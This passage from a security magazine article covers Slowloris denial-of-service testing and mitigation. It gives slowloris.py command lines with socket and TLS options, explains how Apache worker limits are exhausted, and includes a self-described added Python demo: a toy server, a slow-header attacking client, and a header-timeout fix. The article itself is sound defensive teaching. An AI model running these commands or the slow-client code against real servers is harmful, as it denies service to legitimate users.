Denial of service defense

Putting On the Brakes

Bombs Away

To carry out an initial test with Slowloris, type the command

python3 slowloris.py example.com

Don't forget to replace example.com with the domain you want to test in your own environment. Slowloris accepts a number of parameters that control the intensity and type of the test: the number of sockets it opens, the interval between the individual header lines it transmits, and other factors. In other words, you can tune the tool to slip past the defenses deployed on a server, as long as you know the values configured there.

For example, to launch an attack with 5,000 connections, call Slowloris with the -s 5000 option (one socket per connection). The following call runs the attack over TLS (--https) against a server listening on port 8443 (-p 8443):

python3 slowloris.py example.com -s 5000 --https -p 8443

You might notice a remarkable effect of the Apache configuration at this point: If you have not changed any settings, you will not get anywhere near 5,000 simultaneous connections, because Apache's MaxRequestWorkers directive caps the number of requests served concurrently at a few hundred (the upstream default is 256 for the prefork MPM and 16 ServerLimit x 25 ThreadsPerChild = 400 for the worker and event MPMs). The available processes and threads, and with them the available connections, are used up long before Slowloris reaches its socket target. New TCP handshakes still complete, because the kernel queues them in the listen backlog, but no worker is free to read the request, which means that legitimate users can no longer reliably get a response from the web server until you terminate the above command.
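The exhaustion described above, as an added example that is not from the article and not code from the slowloris.py tool: a toy HTTP server in Python with a fixed worker pool (the analogue of MaxRequestWorkers), an attacker that opens as many sockets as there are workers and trickles one bogus header line at a time, and a legitimate client that tries to get through. The scenario runs once with no limit on how long a request header may take, and once with a total budget for the whole header, which is the counterpart of what Apache's mod_reqtimeout enforces with RequestReadTimeout (its default header=20-40,MinRate=500 allows 20 seconds for the header, extended to at most 40 seconds while data keeps arriving at 500 bytes/s). An idle timeout alone would not help here, because the attacker sends something every 0.1 seconds; only the budget on the complete header drops the connection. The toy server, the worker count and all timings are assumptions made for this demonstration.

```python
"""Slow-header (Slowloris-style) worker exhaustion against a toy HTTP server,
with and without a total header-read budget. Added example; the server and the
timings are assumptions, not the article's code or Apache's implementation."""
import socket
import threading
import time


class ToyHTTPServer:
    """Fixed pool of worker threads, like Apache's MaxRequestWorkers.

    header_budget: seconds allowed for the complete request header to arrive
    (None = wait forever, which is what Slowloris relies on).
    """

    def __init__(self, max_workers, header_budget=None):
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind(("127.0.0.1", 0))
        self.listener.listen(128)          # kernel backlog: handshakes still complete
        self.port = self.listener.getsockname()[1]
        self.header_budget = header_budget
        self.dropped = 0                   # connections closed for exceeding the budget
        self.lock = threading.Lock()
        for _ in range(max_workers):
            threading.Thread(target=self._worker, daemon=True).start()

    def _worker(self):
        while True:
            try:
                conn, _ = self.listener.accept()
            except OSError:
                return                     # listener closed: shut the worker down
            with conn:
                self._handle(conn)

    def _handle(self, conn):
        buf = b""
        deadline = None
        if self.header_budget is not None:
            deadline = time.monotonic() + self.header_budget
        while b"\r\n\r\n" not in buf:      # header is complete at the empty line
            if deadline is not None:
                remaining = deadline - time.monotonic()
                if remaining <= 0:
                    with self.lock:
                        self.dropped += 1
                    return                 # total budget exhausted: drop the client
                conn.settimeout(remaining)
            try:
                chunk = conn.recv(4096)
            except socket.timeout:
                continue                   # re-check the deadline at the top of the loop
            except OSError:
                return
            if not chunk:
                return                     # client went away
            buf += chunk
        try:
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok")
        except OSError:
            pass


class SlowClient:
    """Opens `sockets` connections, never finishes the request header and
    trickles one bogus header line every `interval` seconds."""

    def __init__(self, port, sockets, interval):
        self.socks = []
        for _ in range(sockets):
            s = socket.create_connection(("127.0.0.1", port))
            s.sendall(b"GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n")   # deliberately incomplete
            self.socks.append(s)
        self.stop = threading.Event()
        threading.Thread(target=self._trickle, args=(interval,), daemon=True).start()

    def _trickle(self, interval):
        while not self.stop.wait(interval):
            for s in self.socks:
                try:
                    s.sendall(b"X-a: b\r\n")      # never the empty line that ends a header
                except OSError:
                    pass                         # dropped by the server (a real attacker reconnects)

    def close(self):
        self.stop.set()
        for s in self.socks:
            s.close()


def legitimate_request(port, timeout):
    """Send a complete request; True if a 200 response arrives within `timeout`."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.settimeout(timeout)
        s.sendall(b"GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n")
        try:
            return s.recv(4096).startswith(b"HTTP/1.1 200")
        except socket.timeout:
            return False                   # connected (backlog) but never served


def run_scenario(header_budget, workers=4, slow_sockets=4, interval=0.1, client_timeout=2.0):
    """Tie up every worker with slow sockets, then try a legitimate request.
    Returns (legitimate_client_served, slow_connections_dropped)."""
    server = ToyHTTPServer(workers, header_budget)
    attacker = SlowClient(server.port, slow_sockets, interval)
    time.sleep(0.2)                        # let the workers pick up the slow sockets
    served = legitimate_request(server.port, client_timeout)
    attacker.close()
    server.listener.close()
    return served, server.dropped


if __name__ == "__main__":
    print("no header budget:    served =", run_scenario(None))
    print("0.5 s header budget: served =", run_scenario(0.5))
```

Without a budget the four slow sockets hold all four workers indefinitely and the legitimate client, although its TCP connection completes, never receives a response. With a 0.5-second budget every slow socket is dropped after half a second regardless of how often it sends a header line, and the legitimate request is served. In practice the attacker reopens dropped sockets, so the budget must be combined with a connection limit per source and enough workers to outpace the reconnect rate.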

Conclusions

The Slowloris example in this article shows how easy it is to carry out a denial-of-service attack (Table 1 lists the common variants) and how you can protect your web server against it. If you discover a vulnerability in one of your web servers, no matter how small the effect might seem at first glance, define and roll out countermeasures without delay.

Table 1: Known Denial-of-Service Attacks

Type of attack        | Description                                                                                         | Resource consumption          | DoS/DDoS*
Volume-based attacks  | Flood the network with traffic to overload the bandwidth.                                           | Network bandwidth             | DDoS
UDP/ICMP flooding     | Send a large number of UDP/ICMP packets to overload the target system.                              | Network bandwidth, CPU        | DDoS
SYN flooding          | Send a large number of SYN requests without completing the handshake to block connections.          | Network resources, memory     | DDoS
Ping of death         | Send oversized or fragmented ping packets that cause the target system to crash.                    | Network bandwidth, memory     | DoS
Slowloris             | Keep HTTP connections open by transmitting header data slowly until the server's connection limit is reached. | Server connections, memory | DoS
HTTP slow POST/RUDY   | Send POST data very slowly to tie up server resources.                                              | Server connections, CPU, RAM  | DoS
Reflection            | Send requests to third-party servers with a spoofed sender address so that the responses flood the victim. | Network bandwidth      | DDoS
Amplification         | Exploit open servers (DNS, NTP, SSDP) to flood the victim's bandwidth with large volumes of data.    | Network bandwidth             | DDoS

*DoS, denial of service; DDoS, distributed denial of service; UDP, User Datagram Protocol; ICMP, Internet Control Message Protocol; RUDY, R U Dead Yet; DNS, Domain Name System; NTP, Network Time Protocol; SSDP, Simple Service Discovery Protocol.

The Author

Dr. Matthias Wübbeling is an IT security enthusiast, scientist, author, consultant, and speaker. As a lecturer at the University of Bonn in Germany and researcher at Fraunhofer FKIE, he works on projects in network security, IT security awareness, and protection against account takeover and identity theft. He is the CEO of the university spin-off Identeco, which keeps a leaked-identity database to protect employee and customer accounts against identity fraud. As a practitioner, he supports the German Informatics Society (GI), administrating computer systems and service back ends. He has published more than 100 articles on IT security and administration.
